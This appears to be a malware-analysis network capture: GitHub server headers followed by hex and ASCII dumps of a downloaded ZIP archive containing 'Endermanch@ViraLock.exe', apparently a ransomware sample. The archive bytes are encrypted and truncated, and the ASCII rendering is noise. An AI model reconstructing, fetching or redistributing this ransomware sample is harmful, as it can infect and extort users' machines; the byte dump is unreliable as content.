                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0866:0543:E4C3D7:F301C9:6335934A
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:25 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6949-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455765.420041,VS0,VE1
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 3189ca3cd1a0fc8c71a11b5a9b534a8f49b40977
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:54:25 GMT
                                                                                                                                                Source-Age: 267
                                                                                                                                                2022-09-29 12:49:25 UTC4168INData Raw: 50 4b 03 04 33 00 01 00 63 00 0f 37 79 45 00 00 00 00 e1 0f 02 00 00 0a 03 00 17 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 56 69 72 61 4c 6f 63 6b 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 ed 91 64 e0 a1 85 e8 a0 cb 45 4a 4b c9 6b 96 10 99 81 2b 1d 24 3f e8 58 3b ea ca db e6 a4 67 1e 00 e6 fb 80 0f 17 9c a3 3e dc 6a 4f b1 b5 79 ab 70 3a f8 64 1e 80 04 fd 7e c9 a6 7f a7 8a ef 2e 9b 59 cf 79 88 93 ad eb 12 51 f7 b1 0b a9 8e 69 79 e7 f5 b5 5c 8d f8 f4 8e 7d ed ba 1d bb 09 e9 56 19 73 4c 01 8e 40 74 d0 0f f6 3c fe 84 b8 c1 61 75 90 6c 3d 69 a8 71 d5 f5 77 9d c7 2a dd 12 60 a5 7f 68 fe 61 bd b2 eb dd 1d c8 ea 09 9f 33 5c c7 30 80 6f 78 93 69 b5 0f e7 43 98 b4 66 ee 98 8f 3d 7f 45 8d ff f2 1f e4 3e f7 f0 41 99 10 92 0f 32 d0 58 da 23 e0 71 6d 6c 3e dc 81 d2
                                                                                                                                                Data Ascii: PK3c7yEEndermanch@ViraLock.exeAEdEJKk+$?X;g>jOyp:d~.YyQiy\}VsL@t<aul=iqw*`ha3\0oxiCf=E>A2X#qml>
                                                                                                                                                2022-09-29 12:49:25 UTC4169INData Raw: 56 99 97 ec dd bd c9 a3 1c 46 69 0b 2b 24 34 4e 0b 95 8d 76 2d 58 38 52 4f 20 39 99 6d 2a fe d0 2e b8 42 ae f9 10 88 74 73 e5 7e c0 cc 2b a4 98 19 69 f7 64 22 43 e6 74 04 9d 46 ee 4a 82 66 48 db 27 b3 d0 4e 61 71 84 d2 65 98 de f7 5d 9d d9 8c ba 63 f1 e8 c7 4f 45 f6 c1 a4 7d 68 bb 12 3d 5f 27 98 42 fa b8 56 e6 21 f2 41 3d ad 36 6b 59 db b9 60 ff 46 c9 41 42 bf df 11 72 49 30 c1 60 14 20 e8 d5 84 09 05 16 4f ec 06 24 80 86 3b 09 e5 7e 5a 08 0e 5b 76 48 8a 81 ba d0 f0 1c 0f d6 41 87 a9 d9 72 5d ad 99 8b cb 5f e0 05 9d 9c a2 54 df 32 a0 18 45 61 40 e4 c2 a5 1d 6e 77 72 79 19 39 e0 d8 99 17 54 8f 59 02 5b 4f 4e 23 68 38 6c 26 bd e8 97 be 3b a6 67 d5 5b 6a d7 81 45 31 54 6e 37 ea 4e f3 94 f9 36 f7 d5 a1 a7 f6 2f e6 77 08 ff 66 3d 3f b3 f9 8f d6 8d 7f bc ce cf
                                                                                                                                                Data Ascii: VFi+$4Nv-X8RO 9m*.Bts~+id"CtFJfH'Naqe]cOE}h=_'BV!A=6kY`FABrI0` O$;~Z[vHAr]_T2Ea@nwry9TY[ON#h8l&;g[jE1Tn7N6/wf=?
                                                                                                                                                2022-09-29 12:49:25 UTC4171INData Raw: f5 73 f7 5c 0a cf 7b f3 16 2b 3a ca 21 e5 d8 44 4d 88 72 d9 39 ef 8c 05 81 05 d0 b8 b8 70 fc 06 3f a1 66 dd 29 a5 e0 e5 ba d0 89 55 f1 a0 52 87 db 6d ef 02 c1 ab ae 21 fd e6 b6 3e b5 44 30 3b 1a 8e c7 11 7d b8 81 c2 99 2f 5a 35 40 27 51 3b da e6 23 68 49 2d fd 4d 8e 28 66 31 51 f2 31 71 84 89 1c 12 69 99 41 c2 54 69 52 75 ad e1 f2 4d d7 22 25 7a f5 2d 4b e3 35 d0 89 fe 11 eb 7a b3 3e 0f f5 08 85 55 ed e0 ec 23 ab e3 d5 25 ce 18 e6 f3 ae fb 59 25 c3 4d 50 61 b8 7a 3b 59 58 f6 26 6b f0 2c bf c1 cb 44 25 93 e1 87 7e 17 ad 8f 2c fd 51 14 22 7f dd 65 5c 48 cc 50 73 0e da 12 ca 38 78 0e bb de 2a 2f 3b b1 1f ba 3f 2a f8 a7 5d 74 7e e0 f1 43 a4 f8 81 67 92 4a d6 f4 53 67 b8 07 ba e6 10 ef 45 cc 7a db f2 72 ed fb b7 f9 fd 0c 25 9d 33 94 81 7b 81 d5 39 9d f9 06 78
                                                                                                                                                Data Ascii: s\{+:!DMr9p?f)URm!>D0;}/Z5@'Q;#hI-M(f1Q1qiATiRuM"%z-K5z>U#%Y%MPaz;YX&k,D%~,Q"e\HPs8x*/;?*]t~CgJSgEzr%3{9x
                                                                                                                                                2022-09-29 12:49:25 UTC4172INData Raw: a9 4a 12 99 f3 8a cb b7 28 6e 50 53 e4 11 5f 97 cc da b7 72 1a d5 8a 6a 7a 06 ac 26 7c 38 6e da 6b 81 ee a4 5d 7d b9 8f 22 0e 32 0e 0c 36 7a 72 bc a6 8a 22 4e de 4f 02 d4 31 61 57 64 4c 4e a3 8b 1e 1e 5e ae 58 9a 5f 6e 7f 57 77 5b 77 5a 83 9f ba ed 15 c0 45 23 4b 32 9e 7f 5d 61 b7 ac 02 5c d2 a2 8d 38 6e 67 f8 81 6d cc b9 d7 a3 08 a2 28 7f b9 32 c7 4d 90 00 b5 46 1e 92 10 74 ee ea f7 d2 e0 b4 96 50 e2 f9 a5 8a c2 83 6c b9 d9 82 06 97 b5 2d 74 1a 5d 38 f4 f8 40 d5 77 4c 2b 6c be 2a e9 58 a0 a5 a8 73 10 09 52 e2 8f e6 e9 d1 d0 eb 37 59 66 56 73 57 c4 08 64 c7 0b c7 2a 4f 3b 38 2f 56 2d ab fc 23 6c 69 38 83 7b 66 d1 9b a9 61 79 65 1b 8d 80 0f 48 27 0d 20 55 da c1 84 9f 41 1a 06 17 13 10 47 ce 44 30 5a 89 be 1c 70 d9 52 44 62 6d ae a7 f9 88 c8 a5 84 e8 d1 0b
                                                                                                                                                Data Ascii: J(nPS_rjz&|8nk]}"26zr"NO1aWdLN^X_nWw[wZE#K2]a\8ngm(2MFtPl-t]8@wL+l*XsR7YfVsWd*O;8/V-#li8{fayeH' UAGD0ZpRDbm
                                                                                                                                                2022-09-29 12:49:25 UTC4173INData Raw: 4f d7 0a 1b 04 ac 66 0d c3 85 da 2a eb 77 91 f3 ed f7 69 36 47 c1 be 9d d1 94 34 8c a3 a1 8b f5 c8 14 aa 5d c7 5b 5e f8 2f 16 1b ea 66 fa d6 17 5d d3 f4 29 09 b2 17 58 de 34 ab 64 49 6a d4 7f 36 a9 8e bf 21 1d 6e 32 a6 72 9a ae ee 95 5e 4a 7e fa 43 43 fa ca ab 2f 18 03 83 db bc ac 67 3e e6 b6 67 4d 20 d9 d9 3d e2 48 c3 e6 dc 59 6e f0 53 93 43 d0 f4 fe 25 04 76 55 69 88 11 ea 1d 1a a6 b5 50 32 bc 7f 26 58 29 66 ae b6 23 b9 f9 d4 20 6c 4f ed 06 0c 55 70 4b d1 a4 93 06 52 d3 25 c2 8b df 82 03 62 c7 a7 48 3d 65 cd 19 49 0d d7 4f cc f8 6e 9f 4e 22 a1 d6 a7 fd ff 63 f6 05 72 9d f5 20 55 ae a9 57 c1 f8 b8 5c 39 25 2a da 4e b5 c0 93 b6 cd f4 6b 7f 73 cd 39 00 dd c3 4f 24 6a 8d 82 f9 e1 e1 46 52 59 9f 3d d1 a1 47 ee f6 13 d8 bf 99 7b 62 f0 c2 ee a3 c3 88 a5 96 15
                                                                                                                                                Data Ascii: Of*wi6G4][^/f])X4dIj6!n2r^J~CC/g>gM =HYnSC%vUiP2&X)f# lOUpKR%bH=eIOnN"cr UW\9%*Nks9O$jFRY=G{b
                                                                                                                                                2022-09-29 12:49:25 UTC4175INData Raw: b1 b7 0d a1 61 43 b3 3c 2e a4 3c 30 97 9d a3 a2 7d 91 39 d1 27 75 43 96 47 5c 9b 94 47 c7 cf b2 f5 86 e8 63 e2 4c 1d af 4a 88 a5 23 82 12 c1 05 f4 d6 5b 51 88 c1 ea 55 13 f3 1d 18 bd 6e 2d ce dc 2a 98 03 0d cf 06 f9 de 9c 5d 8b 7d fe 23 20 86 a6 e5 ff 27 a7 76 75 90 10 c3 86 a8 23 20 9f d2 90 de 20 2a d5 6e e4 a0 79 cf 44 db 71 23 7c b7 98 3f 26 a1 92 41 42 6c cb 1b ed b5 ec 4b 28 14 62 35 97 c8 00 96 e3 2b 62 a9 a0 88 f3 b7 a3 f5 5c e4 f3 8f 6a 5e 8e 33 32 64 47 a2 e7 6f b8 ae 65 16 29 f2 df 79 ce d3 fe 0a 86 67 5d 04 de 70 c4 64 ec 40 bb c6 c1 1d 0e 01 d9 50 d1 4c d5 c3 20 19 63 45 31 06 96 5a 71 58 82 a4 81 ce 3a 6d e2 1b 10 eb 96 f0 78 65 df 8e fc 19 28 15 07 13 cb 38 67 7e 53 19 6e 63 9b cd ce ea de 0e 8b a2 46 55 10 38 77 ec 9c 29 c1 26 37 c9 7f 1e
                                                                                                                                                Data Ascii: aC<.<0}9'uCG\GcLJ#[QUn-*]}# 'vu# *nyDq#|?&ABlK(b5+b\j^32dGoe)yg]pd@PL cE1ZqX:mxe(8g~SncFU8w)&7
                                                                                                                                                2022-09-29 12:49:25 UTC4176INData Raw: 27 24 03 14 58 3a d2 bd c3 99 3f ae 30 8f 8c e2 54 75 ff 76 74 c6 fa 9c 05 49 bc fe b4 15 13 25 3a 5d 8c 4a e2 77 2f a1 e0 72 76 77 58 df 21 9a a7 99 1d f4 b8 be 3c 43 1d d0 2f cc fd 3e 34 d3 fc 2f 05 b2 e6 5e 3d 6e 18 7d 4d 8e 98 19 aa b3 42 80 b8 22 2c cb d7 82 a2 3d 41 e0 96 19 fa 90 8e 91 56 bb 3c b4 24 65 87 2e a7 3d 6e 25 9d 57 e7 4b 7e 68 be 8a 3c a0 4b 61 62 2a ea 10 d5 e2 03 60 d5 9a c3 36 fd 74 05 6c bd 23 a8 39 2c 78 5b 01 c2 74 db 03 78 26 34 1d b8 ad 34 7d 1c 92 10 8c 1b 96 f5 04 4c f5 4f 51 c8 19 78 47 8c 29 ff 88 cb ee 67 87 fd 4c a8 58 f5 5c 7d 14 24 cc 8a 79 ee a7 aa a0 31 a0 56 a3 c1 5c 26 64 7a 82 86 d8 dd 24 66 55 8f 4d dd ac fb 12 67 9f ca ac f5 52 7d 40 c7 a7 ab d5 26 98 77 e6 c4 ef 5d b7 36 83 8e 4c 1c 6e 4f b3 80 e8 9e 26 74 8a 2a
                                                                                                                                                Data Ascii: '$X:?0TuvtI%:]Jw/rvwX!<C/>4/^=n}MB",=AV<$e.=n%WK~h<Kab*`6tl#9,x[tx&44}LOQxG)gLX\}$y1V\&dz$fUMgR}@&w]6LnO&t*
                                                                                                                                                2022-09-29 12:49:25 UTC4178INData Raw: 08 4d 6b b0 06 1c 14 79 60 fe cc 58 9a 14 9c 55 df fa fb 33 18 96 e2 0d 76 d1 bd f5 01 9a 6f 0f a0 18 c8 f9 48 63 c1 ad 20 5f 3e 10 b9 34 cb d6 b4 55 64 e0 c2 4d 58 83 81 6b b5 7d d7 26 b7 1a a8 4d 79 49 3f c1 8a 59 a4 7d 61 9d 13 53 46 dc 7e 82 bb cc 25 9f 82 a0 3c ba 71 e2 ad 43 30 cf f3 7c d0 8f 38 ae b3 e6 24 47 6d e6 99 92 33 68 a3 9c db 6a f3 24 96 f7 76 5a 48 7e 06 be 7f dd 93 e1 98 78 c4 bf 03 0b 99 bf 8b 3b dd 7e 5a 98 58 ef 28 a2 5c e3 87 1d ea 2e fe 9d 64 b3 54 30 83 b4 40 24 7b 15 75 c3 52 f5 e0 fc b2 19 6f e2 46 60 e8 73 04 01 03 f9 6f 4d 47 3d d1 42 18 62 94 e5 5a ec 2f db d2 68 4f f6 17 3e b2 cf 69 64 9e f2 ec 43 85 12 e2 8c d6 fb 32 71 42 4b 1f 6e 49 bb 30 8f 7a 9c 63 b7 3d 1f 23 32 a0 e2 b3 a4 71 1d 9b 75 b0 b8 ca 68 25 7c d5 30 27 40 ad
                                                                                                                                                Data Ascii: Mky`XU3voHc _>4UdMXk}&MyI?Y}aSF~%<qC0|8$Gm3hj$vZH~x;~ZX(\.dT0@${uRoF`soMG=BbZ/hO>idC2qBKnI0zc=#2quh%|0'@
                                                                                                                                                2022-09-29 12:49:25 UTC4179INData Raw: a0 65 ae 1f 8e da 70 24 61 b8 7f d4 a7 65 2b e8 00 76 75 02 3e c7 24 b1 3e 2e 86 13 c6 27 4e ca 57 bc 6b c9 6f e7 6f 0b 5d e9 b5 06 c2 4d 31 6a a1 85 4b 31 7f 00 27 ec 30 69 16 92 3b dd 26 b0 d2 9a 37 11 85 82 2c 4c 3d 52 00 00 24 48 a8 df f6 39 47 5c 7c f6 14 ea da c1 45 fa 09 57 53 0d 93 20 81 63 92 68 5d 78 6d 08 81 00 ef 87 3a bf eb a6 94 20 d2 04 8c 12 a2 8f ee a7 0c 80 1c 38 33 97 c5 c2 37 d3 88 34 1c 43 81 56 76 97 6e 46 e7 02 03 18 1b 5b 02 ec 75 92 82 8c ba 5e 91 a7 b7 4b 2e ae 84 9b b2 c5 7e b0 cd 1f e1 a1 98 69 1c 47 b9 70 4e ef a8 5b 84 fb fc 30 17 3d 95 5e 72 4c 59 32 1f 26 50 41 4f 62 8a ab db 28 94 72 28 87 9d 6d 73 b9 5c a7 fc d8 ba a8 33 bb 53 18 3d 5d 80 91 7e 91 3a 62 a5 ca d0 89 92 7e fa 7d e7 be e0 43 8e 1c 41 a3 f9 4f 80 6c cd 9b da
                                                                                                                                                Data Ascii: ep$ae+vu>$>.'NWkoo]M1jK1'0i;&7,L=R$H9G\|EWS ch]xm: 8374CVvnF[u^K.~iGpN[0=^rLY2&PAOb(r(ms\3S=]~:b~}CAOl
                                                                                                                                                2022-09-29 12:49:25 UTC4180INData Raw: e2 2b 94 38 7c 73 9d 10 17 69 09 fc c0 91 07 1b 70 8e f9 3a 5e 3c 29 20 37 0c e5 26 70 31 9a 4f 96 b0 33 e9 8b cf b2 4d b9 23 2b 77 ed 3f b9 14 7d 27 4c 53 61 95 68 96 30 23 b7 18 ef 90 55 7e fc 57 d2 7e 60 60 25 3c 2a 08 c5 8e 3f 7e 11 2b 43 77 28 78 b2 c6 b7 19 99 c0 59 4e de ce 8d 82 2b 3f 92 ec c8 f8 f5 96 af f8 f9 00 5c 6d b5 96 2e ce 26 29 24 e9 c1 6b 69 d1 5a 41 70 21 cb f5 44 46 a3 ac 81 30 26 8e a8 75 cb 02 c6 f8 51 0e 7b 17 39 55 d8 4b ed 1c 26 ec 2f be 87 4b 55 89 27 a6 9f 5e 1c 10 52 b0 77 d9 6b 80 96 29 13 00 79 48 57 4e 6b 13 63 43 a4 2e c2 31 c7 23 09 cd 05 cb 55 31 c7 a2 c7 8e b9 ba 1d 86 a2 5d 43 4e a7 d8 e0 d6 d1 2a 36 73 cc 42 aa e6 e7 78 55 bc bf ca 0b 76 a9 e8 89 1b 83 9f de 36 10 2b 57 55 08 46 87 d4 b3 a9 7f a9 67 68 a1 4f 33 a7 ed
                                                                                                                                                Data Ascii: +8|sip:^<) 7&p1O3M#+w?}'LSah0#U~W~``%<*?~+Cw(xYN+?\m.&)$kiZAp!DF0&uQ{9UK&/KU'^Rwk)yHWNkcC.1#U1]CN*6sBxUv6+WUFghO3
                                                                                                                                                2022-09-29 12:49:25 UTC4182INData Raw: 5a 58 c2 37 e0 5d 4c 0f 17 ae 63 58 14 e2 5a 5f 1d 65 a3 0a 0c 42 a1 c8 49 6f 11 b5 3f 7e 04 01 a8 50 18 7c 2a 3f 6c 7f 10 2d 90 3b bc 63 7a 87 16 e9 da 0b ce a5 2c bf 7a 90 b3 76 08 ca cf fe f3 e6 f6 4a 05 3d 97 21 cc 9a e2 da e6 81 c4 2c cb 86 ec 37 46 6a 0c 10 4a 0f 02 3d ba 80 d3 3e d0 a6 34 71 bd 6a a6 ae f5 13 b3 19 9f 00 3b bc fc ed 1f c7 75 99 25 41 5c 3a d4 98 88 dc df 1f ca d0 60 13 88 f2 bb 98 f8 5e 05 d2 4a d5 49 57 d7 c0 3e cc 72 9f 38 37 3a ce d3 ce 71 91 35 3b 59 dd 07 41 20 c7 dd 69 ef 95 eb e9 48 b5 33 46 49 d7 e8 9a b0 ed f2 b7 7e b8 b6 8d b2 38 ca fd 04 a3 88 38 e4 b2 11 aa 95 a9 e3 ca 38 5d 35 41 fd e8 a0 18 e3 41 7a 0f f8 b1 e1 44 b9 3a 42 96 26 49 6c e6 c8 4b fd 5c 1a 2a ec 9a d3 04 cb fd 44 42 51 75 42 d1 07 26 d0 ce c7 3e 03 cd f7
                                                                                                                                                Data Ascii: ZX7]LcXZ_eBIo?~P|*?l-;cz,zvJ=!,7FjJ=>4qj;u%A\:`^JIW>r87:q5;YA iH3FI~888]5AAzD:B&IlK\*DBQuB&>
                                                                                                                                                2022-09-29 12:49:25 UTC4183INData Raw: 30 68 d1 4d 94 cc 33 41 8c 0a 6d 02 99 c1 b0 2e 8a 54 3c f5 68 86 59 9d a8 0b c5 d9 ad ce d8 c4 b4 f2 be b4 51 db 07 54 6a 90 a0 fe 3f f5 f3 6f e8 41 3b a7 ec ea 7d 54 86 bc 84 75 9e 24 a7 62 f8 ac c6 20 9b 86 5e 1d 35 4d 47 d7 7b f9 ca d1 ef 02 d0 22 d6 d1 1e 2c 91 8a 1b 49 52 ae cf 01 77 9b e4 26 b2 81 de 27 c1 6e 91 e6 2e 19 e9 5e 2c c2 94 6a a8 a2 a8 16 26 a9 da 2d 54 f3 95 be 76 ce a0 8d 42 ac 8f 35 5d 15 3a d7 e2 7f aa 61 3e 84 87 a7 6f ae 82 d2 f7 b3 24 e8 33 f4 22 a7 37 e5 2c 15 03 cf 3a 36 41 ac a3 1c e3 09 87 3a 2a 69 c9 29 6d d4 47 ab 0b fe dd 2d 01 dd f2 35 20 e6 d7 f3 f9 c6 87 b4 4c 82 67 59 c8 08 e5 ce 05 6a 2e 0f bc 4a 51 07 78 58 3c 7f c2 99 1f 84 3d 81 92 1c 19 67 86 18 14 ab 67 83 36 28 e9 3a 7e 16 4f a7 c4 6c 3a ea d8 e9 f3 07 98 2f c0
                                                                                                                                                Data Ascii: 0hM3Am.T<hYQTj?oA;}Tu$b ^5MG{",IRw&'n.^,j&-TvB5]:a>o$3"7,:6A:*i)mG-5 LgYj.JQxX<=gg6(:~Ol:/
                                                                                                                                                2022-09-29 12:49:25 UTC4183INData Raw: 7d f7 ca 32 ea 27 d2 bc 1e e4 9c ab 11 4a c7 57 d1 70 59 36 ff 67 21 93 81 d6 7a b6 03 15 bb 16 43 bb de 04 21 de 05 49 24 df d7 f7 c5 f3 73 0b b1 5e 57 76 7b e4 48 0a ec 53 18 24 51 09 ea b5 71 b0 7e 7e d9 74 7f 0c 74 45 11 87 de 68 d2 45 1a dd 9c 76 74 35 4c ad 89 ca a8 de cc a6 75 e5 3a 05 6c c9 67 7a 76 a6 83 17 89 c5 32 62 ad b6 c5 d5 3a c8 96 2c 45 c5 b6 29 98 8a 06 35 c9 4d c9 ca ff 73 81 6e e4 5c 72 cb 1a 9c ce 22 ba ec a7 bd 92 f7 41 40 1f eb 9f d2 3f 96 88 47 91 a2 f0 4e cc 49 d4 d8 53 75 fa 70 e8 6a 94 12 f4 6e 22 8a cc 5f 54 68 62 d1 41 2d 49 59 5a ce ea 6d 60 e0 6c cf 4c d5 9f e6 09 29 fa 5c f0 38 28 79 5c ea f5 b0 9b d1 bc 39 7b 17 b8 c5 2f b1 14 c4 37 52 ab 2b 62 3b 75 d1 c5 7f 64 a5 06 36 da e2 b7 fe c1 4e 0c 6c b0 e0 d0 7a 5f 5e 02 df 71
                                                                                                                                                Data Ascii: }2'JWpY6g!zC!I$s^Wv{HS$Qq~~ttEhEvt5Lu:lgzv2b:,E)5Msn\r"A@?GNISupjn"_ThbA-IYZm`lL)\8(y\9{/7R+b;ud6Nlz_^q
                                                                                                                                                2022-09-29 12:49:25 UTC4199INData Raw: d7 c6 57 03 d1 c3 93 8a f2 87 7f 02 7b c5 69 70 91 47 c3 d2 ba 5a 14 88 0c 97 61 07 a8 b9 46 fb 52 bb 40 05 8e 68 68 5e 6c 0b f2 f3 6c 76 9b 96 41 76 39 05 c1 ef 73 09 52 57 7e 2d 9e bf 8f 6e 5a 18 1e d1 47 d6 0b 18 3c d6 6c 8d 78 94 cc 7e 78 e4 60 58 9a f2 8c d1 be ff 81 07 81 1d 64 f0 29 98 e0 bd fc c9 d3 df 2e 9e 6a 9c fb c9 86 71 31 05 6a 46 b6 b6 3f f5 72 60 ee d0 9f 15 3f c5 27 7e 69 42 22 5a f7 7e 4b 1c da 54 12 ba 2f 5d a3 ab 48 45 80 d0 2d 86 d2 08 c2 e6 20 20 8a 73 31 d6 83 bd d7 9f d2 f9 2c 3e 92 25 c6 d2 29 65 11 03 18 5e 3c ff 0d 9e 79 61 0f 81 05 50 dc 1e 0d b7 c1 80 58 3e ee 1c 41 ee b5 8a e8 e0 02 e9 dd 12 1d ed c2 cd ea fe 2c 61 6e 52 ca 26 e5 66 95 41 4a 01 7f 9c eb f7 ec 6a fa 92 b1 9c 33 16 44 72 94 42 15 25 25 a9 07 b0 04 61 da c0 c3
                                                                                                                                                Data Ascii: W{ipGZaFR@hh^llvAv9sRW~-nZG<lx~x`Xd).jq1jF?r`?'~iB"Z~KT/]HE- s1,>%)e^<yaPX>A,anR&fAJj3DrB%%a
                                                                                                                                                2022-09-29 12:49:25 UTC4215INData Raw: 31 12 c9 20 11 d2 1c a4 da fd 18 4b 97 f9 9f 60 e9 8e 2b 34 ac f6 df 7d 71 99 78 54 4e 4c cc 69 bb c6 49 c4 79 68 ec bc b4 d8 78 71 70 17 af 5b 72 7e 9a 54 d4 a4 4f a4 10 46 8b 30 10 5d 24 94 c7 73 f3 d1 21 11 62 5c fe a0 3a b9 82 f6 6e 49 13 f7 84 d4 76 30 90 00 89 30 31 98 fb bb b1 49 2a 64 2e 90 2a e4 bb b0 50 4a f2 d3 9f e0 78 f0 91 48 79 21 86 87 8b 4e 13 eb c5 9c c1 07 26 b2 25 c7 95 1f b4 9e 6d 18 6e 73 25 56 d5 aa 29 a9 99 ef d8 40 83 86 0c aa a2 c8 63 73 c8 7f d3 b3 c3 05 2b e7 f9 55 2b af 35 44 03 39 82 49 5c 62 e4 ce 51 98 1a d4 bc 47 e2 36 2b fd 92 96 26 58 40 4d 51 67 0c 0e 7a b1 c2 64 09 37 70 96 4a 8f 61 c0 7b ae 93 24 94 7b 3a 2e ba ab 15 47 be 3d 1e 83 73 5a 8e 6a eb 41 65 5a 2c c5 08 49 57 d7 12 78 13 99 e0 d7 be 9f 60 e7 68 78 5c 3c 39
                                                                                                                                                Data Ascii: 1 K`+4}qxTNLiIyhxqp[r~TOF0]$s!b\:nIv001I*d.*PJxHy!N&%mns%V)@cs+U+5D9I\bQG6+&X@MQgzd7pJa{${:.G=sZjAeZ,IWx`hx\<9
                                                                                                                                                2022-09-29 12:49:25 UTC4231INData Raw: 2a 79 0c 8d 3e 14 e6 14 2d 43 6b 61 ef 0d 54 ff c4 35 2d aa 7b 7f bb b0 89 d6 25 7e 52 14 8b 53 6f fa cb ed 1e c2 cf f8 39 87 dc 22 ff 9c c3 73 e6 c3 7a 25 00 95 ca a5 98 5d 45 7c f1 6e 03 d8 0e a3 52 4f 8d 9d f0 10 51 7c 1b 3f 75 23 c3 b5 53 9d 04 a1 54 14 22 c8 f2 5c 0a 85 80 2b 19 40 f6 fd 47 87 a1 dc d3 12 74 67 2d 7c 35 8a af e4 78 f4 dc 42 50 e8 7d 6a 14 63 80 20 b5 2c 0c 6c ed 6b 0e d9 72 3a bc c6 59 91 39 e4 e2 84 75 07 a4 31 93 e7 60 09 68 39 d2 c9 f6 07 f0 83 ef a4 15 f8 c0 96 88 6d 08 3d 23 e1 a0 ee 8e b3 cc 77 c5 64 5e b9 55 07 3f e4 4c 53 7a 23 99 fa 5d bc 3d 89 7c d0 7e d4 9d 49 71 a8 e2 56 86 8f 62 52 b4 45 35 da 93 74 88 86 82 fb 91 ef 9a 2d 7e 84 a1 3a 1b c6 2a ea d1 f0 8a 08 9e ff b8 f1 a6 ae 9b 6e 74 1f 97 da 38 df 5b da a2 f2 22 5c 3f
                                                                                                                                                Data Ascii: *y>-CkaT5-{%~RSo9"sz%]E|nROQ|?u#ST"\+@Gtg-|5xBP}jc ,lkr:Y9u1`h9m=#wd^U?LSz#]=|~IqVbRE5t-~:*nt8["\?
                                                                                                                                                2022-09-29 12:49:25 UTC4247INData Raw: ac 83 86 92 f5 d3 d4 1a 67 b2 69 16 fd 26 e4 d6 3f f0 20 f8 46 d7 75 ed e0 75 9d c6 74 d5 8d 80 73 7e 71 0a 32 6f ca dc 76 70 6d 6a f0 15 1f 50 b2 af 4e 0e 19 d8 9b be 5d a3 b0 8b 96 d4 12 60 cb f2 30 ba d4 9e c3 35 51 bb e0 af 55 f2 41 8a 11 98 a4 8c aa 38 41 36 58 f4 b9 6c 11 0e 29 dd 61 d3 77 15 03 6c c2 6a b7 d1 48 8a d4 1f 65 dc 82 6b b0 83 93 77 47 6b 76 9b d6 a5 0c ce ca c7 4a d3 c4 e2 62 b3 69 ae 48 3b 18 ed 4b 5a 85 39 34 3c ee 48 14 4a 35 ef 48 fb 61 80 91 7d bc 96 a5 66 16 9f 2e a2 ca 23 21 ec 54 e8 86 41 c1 e9 e0 8f d2 d2 0c 54 92 0a 40 8c 3d 62 27 b2 33 bc 7f 57 6a 51 89 09 c9 5c 19 11 f0 e2 20 66 36 cb 9e 34 17 35 cc 7d 19 78 f0 91 79 df 91 dc cc 59 51 a6 b4 a9 12 2e ba 73 05 e6 23 2f ac 1b 18 f2 ac ce 51 e3 f1 63 fa a8 bb b1 b2 6f f7 f9 2b
                                                                                                                                                Data Ascii: gi&? Fuuts~q2ovpmjPN]`05QUA8A6Xl)awljHekwGkvJbiH;KZ94<HJ5Ha}f.#!TAT@=b'3WjQ\ f645}xyYQ.s#/Qco+
                                                                                                                                                2022-09-29 12:49:25 UTC4263INData Raw: 78 b7 97 32 c4 37 22 27 06 d3 98 c3 b8 93 ad 01 94 c7 2b 29 8a 09 db 95 c4 24 c4 60 ec 2a 33 af c3 4b 86 55 6c 3f 37 0a 0f 1f 12 06 9e e8 ed 7a 8a ec fb bc 72 f7 f9 c4 b0 86 cf 3f f9 6c 0f 72 f6 ab 6a a0 7a 3b 08 d4 38 77 5e 78 ec 3a 13 1e c7 59 be 38 65 d3 04 d6 52 ed 54 99 8b 83 7f ee 80 4f 4c 90 b1 40 b4 cc 81 22 15 dd 5e 28 c6 aa a7 eb e0 de 4a 99 b8 bd 98 f3 43 5c 28 25 ff 52 5d 07 e3 0d 5e 9c 94 72 96 65 3a 81 1a 41 62 93 f1 e2 f0 80 f8 b0 6a d5 dc 27 9e 81 61 87 4a 73 54 96 e3 2f 02 a7 54 da e3 ab 00 ad 3a 0b 9c 01 7f 51 b0 05 72 d2 a0 cc 33 bc c7 81 10 cd 6e 10 e8 de ea 44 30 e0 5c 3c 91 77 9c 21 02 85 1f 14 63 c3 19 3b ce cb b3 1c 81 de a0 2f 31 b9 71 ba 26 d8 ef 8d 47 de 45 e4 e0 3a c2 41 d3 1c 79 e6 3e 0c 32 99 e9 1c b1 5f 3a b6 e3 66 4a c9 ec
                                                                                                                                                Data Ascii: x27"'+)$`*3KUl?7zr?lrjz;8w^x:Y8eRTOL@"^(JC\(%R]^re:Abj'aJsT/T:Qr3nD0\<w!c;/1q&GE:Ay>2_:fJ
                                                                                                                                                2022-09-29 12:49:25 UTC4279INData Raw: 18 90 c9 dc 7c 8c f4 20 19 89 9e a7 9b a6 53 4e d3 c3 bf 56 a3 92 a6 35 69 33 0f ff 81 ce 4b 35 7d f3 16 24 a7 f9 a2 6e 8b 60 1c 36 29 4e 9e 41 de cd 52 23 8e db 80 12 ec 62 bd d7 f6 35 fa f2 89 69 e1 c8 77 30 3f dc 12 43 b1 3b 35 9c 73 08 d5 16 3f f7 46 41 53 0c 3c 93 98 f9 42 02 fc e1 61 9e 1e 10 7b 1e b7 db 4b 6f e5 65 d6 2a c1 6e 66 c8 81 a2 fe 59 da de 46 f9 16 f3 e2 78 72 74 81 dd 9e 69 3b 36 9f da b3 48 9d 14 21 65 b1 75 82 bc 09 ff d9 db 48 9e 27 fc 73 97 cc a8 51 13 1a e5 de ae c7 bf 59 29 87 c2 4c 6b 22 a8 3f f1 51 3e 59 f2 b5 f9 c7 62 dc 94 6a 8a da f3 7c 52 78 ee 84 14 bb d0 92 d3 04 f0 b3 51 fb cd e9 ac 10 36 9a 25 eb 2d 91 ca 82 c8 e9 df 8f f1 5c 17 e8 9b 3c 0d 07 b1 ba 28 91 23 87 8f b8 90 74 06 81 fb 99 0c 